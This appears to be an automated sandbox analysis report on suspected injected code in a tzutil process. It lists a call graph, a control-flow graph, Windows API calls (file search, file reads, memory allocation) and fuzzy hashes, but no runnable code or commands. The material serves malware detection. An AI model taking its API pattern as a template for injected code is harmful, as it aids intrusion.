101733->101732 101735 32174c0 101733->101735 101736 32174d6 101735->101736 101738 321750c 101735->101738 101736->101738 101739 3217330 LdrLoadDll 101736->101739 101738->101732 101739->101738 101741 3215fd0 101742 3218500 LdrInitializeThunk 101741->101742 101745 3216000 101741->101745 101742->101745 101744 321604a 101745->101744 101746 321602c 101745->101746 101747 3218480 101745->101747 101748 32184c4 101747->101748 101749 32184e5 101748->101749 101754 3228b00 101748->101754 101749->101745 101751 32184d5 101752 32184f1 101751->101752 101753 3229780 NtClose 101751->101753 101752->101745 101753->101749 101755 3228b7d 101754->101755 101757 3228b2b 101754->101757 101759 39f4650 LdrInitializeThunk 101755->101759 101756 3228b9f 101756->101751 101757->101751 101759->101756 101760 321c9d0 101762 321c9f9 101760->101762 101761 321cafc 101762->101761 101763 321caa0 FindFirstFileW 101762->101763 101763->101761 101766 321cabb 101763->101766 101764 321cae3 FindNextFileW 101765 321caf5 FindClose 101764->101765 101764->101766 101765->101761 101766->101764 101767 32126d0 101768 3212706 101767->101768 101769 3228e30 LdrInitializeThunk 101767->101769 101770 321271b 101768->101770 101772 3229810 101768->101772 101769->101768 101773 322989f 101772->101773 101775 322983b 101772->101775 101777 39f2e80 LdrInitializeThunk 101773->101777 101774 32298cd 101774->101770 101775->101770 101777->101774 101778 3213553 101779 3218180 2 API calls 101778->101779 101780 3213563 101779->101780 101781 3229780 NtClose 101780->101781 101782 321357f 101780->101782 101781->101782 101793 3221ed0 101794 3221ee9 101793->101794 101795 3221f31 101794->101795 101798 3221f71 101794->101798 101800 3221f76 101794->101800 101796 322b7f0 RtlFreeHeap 101795->101796 101797 3221f41 101796->101797 101799 322b7f0 RtlFreeHeap 101798->101799 101799->101800 101801 32216d1 101806 32295f0 101801->101806 101803 32216f2 101804 3229780 NtClose 101803->101804 101805 3221719 101804->101805 101807 322961e 101806->101807 101808 322969a 101806->101808 101807->101803 101809 32296ad NtReadFile 101808->101809 101809->101803

                                                              Executed Functions

                                                              Function 03209F80 Relevance: 26.7, Strings: 21, Instructions: 431COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 26 3209f80-320a2c1 27 320a2cb-320a2d5 26->27 28 320a321-320a32b 27->28 29 320a2d7-320a2f6 27->29 30 320a33c-320a348 28->30 31 320a308-320a319 29->31 32 320a2f8-320a306 29->32 34 320a356 30->34 35 320a34a-320a354 30->35 33 320a31f 31->33 32->33 33->27 36 320a35d-320a364 34->36 35->30 38 320a396-320a3a0 36->38 39 320a366-320a394 36->39 40 320a3b1-320a3bd 38->40 39->36 41 320a3cd-320a3d7 40->41 42 320a3bf-320a3cb 40->42 44 320a3e8-320a3f4 41->44 42->40 45 320a3f6-320a409 44->45 46 320a40b-320a41c 44->46 45->44 48 320a42d-320a436 46->48 49 320a438-320a44a 48->49 50 320a44c-320a456 48->50 49->48 52 320a467-320a473 50->52 53 320a475-320a488 52->53 54 320a48a-320a48e 52->54 53->52 56 320a490-320a4b5 54->56 57 320a4b7 54->57 56->54 58 320a4be-320a4c7 57->58 59 320a5d0-320a5da 58->59 60 320a4cd-320a4d4 58->60 61 320a5eb-320a5f7 59->61 62 320a506-320a509 60->62 63 320a4d6-320a504 60->63 64 320a5f9-320a60c 61->64 65 320a60e-320a618 61->65 66 320a50f-320a518 62->66 63->60 64->61 70 320a629-320a635 65->70 68 320a534-320a543 66->68 69 320a51a-320a532 66->69 71 320a545 68->71 72 320a54a-320a554 68->72 69->66 73 320a647-320a64e 70->73 74 320a637-320a63d 70->74 71->59 75 320a565-320a571 72->75 78 320a654 call 322b450 73->78 79 320a6f7-320a6fb 73->79 76 320a645 74->76 77 320a63f-320a642 74->77 80 320a573-320a585 75->80 81 320a587-320a59b 75->81 76->70 77->76 88 320a659-320a663 78->88 84 320a73c-320a746 79->84 85 320a6fd-320a71e 79->85 80->75 86 320a5ac-320a5b5 81->86 91 320a757-320a760 84->91 89 320a720-320a729 85->89 90 320a72c-320a73a 85->90 92 320a5b7-320a5c9 86->92 93 320a5cb 86->93 94 320a674-320a67d 88->94 89->90 90->79 95 320a762-320a772 91->95 96 320a774-320a77e 91->96 92->86 93->58 100 320a68d-320a694 94->100 101 320a67f-320a68b 94->101 95->91 97 320a780-320a79a 96->97 98 320a7b6-320a7ba 96->98 103 320a7a1-320a7a3 97->103 104 320a79c-320a7a0 97->104 105 320a7d5-320a7df 98->105 106 320a7bc-320a7d3 98->106 107 320a696-320a6a7 100->107 108 320a6bd-320a6c7 100->108 101->94 113 320a7b4 103->113 114 320a7a5-320a7ae 103->114 104->103 115 320a7f0-320a7fa 105->115 106->98 110 320a6a9-320a6ad 107->110 111 320a6ae-320a6b0 107->111 112 320a6d8-320a6e4 108->112 110->111 116 320a6b2-320a6b8 111->116 117 320a6bb 111->117 112->79 118 320a6e6-320a6f5 112->118 113->96 114->113 119 320a811-320a81a 115->119 120 320a7fc-320a80f 115->120 116->117 117->100 118->112 120->115
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ".$'$-q$.j$1G$4U$7$9$@<$B0$Ng$T_$[_$dr$n$o$tp$u$z$R$i
                                                              • API String ID: 0-3230942322
                                                              • Opcode ID: d2fceb3984bf6131fc5bbc0a0e3e4c86090a5b8b55a6a7e6dd9dc9d279c4d58f
                                                              • Instruction ID: e5587581c8f7fd95d0db1ba167feb44b3a91e03c8f9a1a5c4c71020bc3cf8e6c
                                                              • Opcode Fuzzy Hash: d2fceb3984bf6131fc5bbc0a0e3e4c86090a5b8b55a6a7e6dd9dc9d279c4d58f
                                                              • Instruction Fuzzy Hash: FE32ACB0E25269CFEB24CF54C894BDDBBB1BB45308F9081D9D44A6B281C7B95AC9CF41
                                                              Function 0321C9D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321CAB1
                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 0321CAEE
                                                              • FindClose.KERNELBASE(?), ref: 0321CAF9
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Find$File$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 3541575487-0
                                                              • Opcode ID: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction ID: 4b2cba86e737c05c147f892595ee2ad335bc5b702d026bf7618c7f35bfcb0b1c
                                                              • Opcode Fuzzy Hash: 9efabfec53aab301c1426a02d9abc6dfc8d0331be8f0d257ef249e84ffe0ed2d
                                                              • Instruction Fuzzy Hash: 5F31D4BA910319BBDB21DF60CC84FEF77BC9F54705F140448B908AA180DAF0AAD4CBA0
                                                              Function 03229480 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtCreateFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?,?,?), ref: 0322957B
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction ID: 7d0be3fb2b0ce5ded181d6e511e34165e8e7427962fac13568d634b537547f6e
                                                              • Opcode Fuzzy Hash: 8ba261b2d37e6a8c686c9a337af97115225191aaef6764030400665b8a8f1ef3
                                                              • Instruction Fuzzy Hash: 8831C5B5A11248AFCB54DF99D880EEEB7F9EF88304F108119F908A7340D770A951CBA5
                                                              Function 032295F0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtReadFile.NTDLL(?,?,5BC7A5B0,?,?,?,?,?,?), ref: 032296D6
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction ID: 75688ea78f04a4bcfe59889a516a329ca6ca644c62aedbe6da48438f22ca5c53
                                                              • Opcode Fuzzy Hash: 8854d8be901c82b9d220803e696c0cf83c1867f68dd6e83b9ca46992c6265491
                                                              • Instruction Fuzzy Hash: C031E7B5A10208AFCB14DF99DC40EEFB7F9EF88704F108209F958AB340D670A951CBA5
                                                              Function 032298E0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(032121AE,?,5BC7A5B0,00000000,00000004,00003000,?,?,?,?,?,032282FF,032121AE), ref: 032299A8
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction ID: 8f6d34db5194f2f0b675a26b1f6fb105199e29ffe44af04d825a68e147070042
                                                              • Opcode Fuzzy Hash: 5b92f69d731c09572eaa479caca9063e28d84d04115c7dc8f8bf517fd5e8e384
                                                              • Instruction Fuzzy Hash: 3D2106B5A10349ABDB10DF99DC81EEFB7B9EF89700F108109F948AB240D774A9518BA5
                                                              Function 032296E0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction ID: e5106a119efd5cd416e5f5116e668c7f3933ad24ea33e6ea4250a55df83a4d9c
                                                              • Opcode Fuzzy Hash: 38d2c0a562f0e836078364a94c412914a01c43bf8487e80c7c7915257a3d256d
                                                              • Instruction Fuzzy Hash: 5F11A0756117187AD720EA55DC41FABB7ACDF85704F104109F94C6B280DBB0B954CBA6
                                                              Function 03229780 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 032297B1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3200000_tzutil.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction ID: 4721a0e49781a547d7c2a6d3393e6df26b9eb71fa1d0c71780376ed4688d079d
                                                              • Opcode Fuzzy Hash: 2f59229fe5a35477addfa38c4a351323b046b53500d51ab444dffaebc889c80f
                                                              • Instruction Fuzzy Hash: C4E08C3A211714BBD220FA5ADC00F9BBB6CEFC6710F408115FA48AB281C6B1B9148BF0
                                                              Function 039F4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7c3adbc09f1be0b34b4a5c106fdaa40909ad4bc353a383d1918ea387949acb39
                                                              • Instruction ID: e52265c94697f9e938ce5aba5c349aaffabfa8bab6c294d99be03f53aa08316f
                                                              • Opcode Fuzzy Hash: 7c3adbc09f1be0b34b4a5c106fdaa40909ad4bc353a383d1918ea387949acb39
                                                              • Instruction Fuzzy Hash: 65900231605C04529140B1585884546400997E0301B56C012E0425598C8B188A565375
                                                              Function 039F4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 75d82233894b1d3a2c62cecc26726235a05ca91a2bb3a1f4f321a56fe25d57ad
                                                              • Instruction ID: 525c9fe296e8f88a2ceec949d04678834f7456ee32894c3d2725911a8c90baba
                                                              • Opcode Fuzzy Hash: 75d82233894b1d3a2c62cecc26726235a05ca91a2bb3a1f4f321a56fe25d57ad
                                                              • Instruction Fuzzy Hash: 8B900261601904824140B1585804406600997E1301396C116A05555A4C871C8955927D
                                                              Function 039F2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5b38a6c2fe608ce3ffd6b22ce5266f121a8d38badfcb6b688470d5c23e963426
                                                              • Instruction ID: b918db0a76e6fce5cbc93619cd9d9e90d7a0883a23c552d9856ed1388f2031e7
                                                              • Opcode Fuzzy Hash: 5b38a6c2fe608ce3ffd6b22ce5266f121a8d38badfcb6b688470d5c23e963426
                                                              • Instruction Fuzzy Hash: 2990023160580C42D150B1585414746000987D0301F56C012A0025698D87598B5576B5
                                                              Function 039F2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0abdd6d8841d51e7757498bf3efc129c30d643d5144ec38a04dc4c30d6022e6b
                                                              • Instruction ID: c75f349a9db8446569830cb8cbd16b489f5ddd5a7f153aafa1936abfb76cc2d0
                                                              • Opcode Fuzzy Hash: 0abdd6d8841d51e7757498bf3efc129c30d643d5144ec38a04dc4c30d6022e6b
                                                              • Instruction Fuzzy Hash: 9390023120180C42D180B158540464A000987D1301F96C016A0026698DCB198B5977B5
                                                              Function 039F2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 345b1dfe57aeef9b79ff9bf7b47230ecb307b9f9671805da4d298c076a1c5782
                                                              • Instruction ID: ef8e57c4cc476dc49975912577fb1ac1f657dedf7ea623733c536f381276f169
                                                              • Opcode Fuzzy Hash: 345b1dfe57aeef9b79ff9bf7b47230ecb307b9f9671805da4d298c076a1c5782
                                                              • Instruction Fuzzy Hash: 5790023120584C82D140B1585404A46001987D0305F56C012A00656D8D97298E55B675
                                                              Function 039F2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2f18d895c7c9e35b3c2f5a2b4c2534484fe574b6ab1b6052e061793e77808a8e
                                                              • Instruction ID: b1411211dfd18bf1de879d0401761d31fc11c052e57303fb4b9d5274366121a0
                                                              • Opcode Fuzzy Hash: 2f18d895c7c9e35b3c2f5a2b4c2534484fe574b6ab1b6052e061793e77808a8e
                                                              • Instruction Fuzzy Hash: 60900261202804434105B1585414616400E87E0301B56C022E10155D4DC62989916139
                                                              Function 039F2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9cfc2b650028779b2ba8a5e7590f70ed2a1b28fb555fc0eb1951ccf4313fe509
                                                              • Instruction ID: 08b368d6d05128c1d4d8facf88d395e30610ebeb493565687ed7902100c991f5
                                                              • Opcode Fuzzy Hash: 9cfc2b650028779b2ba8a5e7590f70ed2a1b28fb555fc0eb1951ccf4313fe509
                                                              • Instruction Fuzzy Hash: 9B900435311C04430105F55C1704507004FC7D5351357C033F10175D4CD735CD715135
                                                              Function 039F2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a6dbecc98ccb5c6dea33a1e53ebe4e421ac7c1e057ecefd7652d2ae9110be5c9
                                                              • Instruction ID: 9db0e2cd9898a26edf6c5547cc9b5431b91e7da04ceee649cf7f09018c8d522f
                                                              • Opcode Fuzzy Hash: a6dbecc98ccb5c6dea33a1e53ebe4e421ac7c1e057ecefd7652d2ae9110be5c9
                                                              • Instruction Fuzzy Hash: 63900225221804420145F558160450B044997D6351396C016F14175D4CC72589655335
                                                              Function 039F2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2e74e423d2efd63448ea12bb32adf0384efbbd8ccaa5303b03fb2c840fc72ea7
                                                              • Instruction ID: 6a4cac155868e1df695b83af79326e6da278521be2449868215b1bf5ede15415
                                                              • Opcode Fuzzy Hash: 2e74e423d2efd63448ea12bb32adf0384efbbd8ccaa5303b03fb2c840fc72ea7
                                                              • Instruction Fuzzy Hash: DF900221601804824140B16898449064009ABE1311756C122A0999594D865D89655679
                                                              Function 039F2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 636c742156d339057245393af77ad67f56d274f7ee5894c102eaaa0b212a3832
                                                              • Instruction ID: 10ea88beb5035c812e898236034cda243cb40d4615dfc9181a98f0851ce44959
                                                              • Opcode Fuzzy Hash: 636c742156d339057245393af77ad67f56d274f7ee5894c102eaaa0b212a3832
                                                              • Instruction Fuzzy Hash: 98900221211C0482D200B5685C14B07000987D0303F56C116A0155598CCA1989615535
                                                              Function 039F2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5e42d4053721cced3c33be288a2f33be854a4fea013059c27dd889e960620fca
                                                              • Instruction ID: 0fa11d143b7b6016feaa2490db808422d2a9a2bb610510c8fb5334c22c1ae970
                                                              • Opcode Fuzzy Hash: 5e42d4053721cced3c33be288a2f33be854a4fea013059c27dd889e960620fca
                                                              • Instruction Fuzzy Hash: B990026134180882D100B1585414B060009C7E1301F56C016E1065598D871DCD52613A
                                                              Function 039F2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b9a932b12370ef83b976116b010c6e609b081c10b78b893141f40c0197dcf8d4
                                                              • Instruction ID: bb4bb734811bc789774074fab9e7c7baaccd7269fe60c3f0abc12838b995e926
                                                              • Opcode Fuzzy Hash: b9a932b12370ef83b976116b010c6e609b081c10b78b893141f40c0197dcf8d4
                                                              • Instruction Fuzzy Hash: F690022160180942D101B1585404616000E87D0341F96C023A1025599ECB298A92A135
                                                              Function 039F2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, Offset: 03980000, based on PE: true
                                                              • Associated: 00000007.00000002.3289407600.0000000003AA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003AAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_3980000_tzutil.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 77f2176f1b2258b8fe7579b4446b6e91058a78e144306031a097421006ae70c8
                                                              • Instruction ID: be94351e97ecb95139f5dfbcdbb15cb10e05dc254fe90dc28aabadc9bd53753d
                                                              • Opcode Fuzzy Hash: 77f2176f1b2258b8fe7579b4446b6e91058a78e144306031a097421006ae70c8
                                                              • Instruction Fuzzy Hash: 99900261201C0843D140B5585804607000987D0302F56C012A2065599E8B2D8D516139
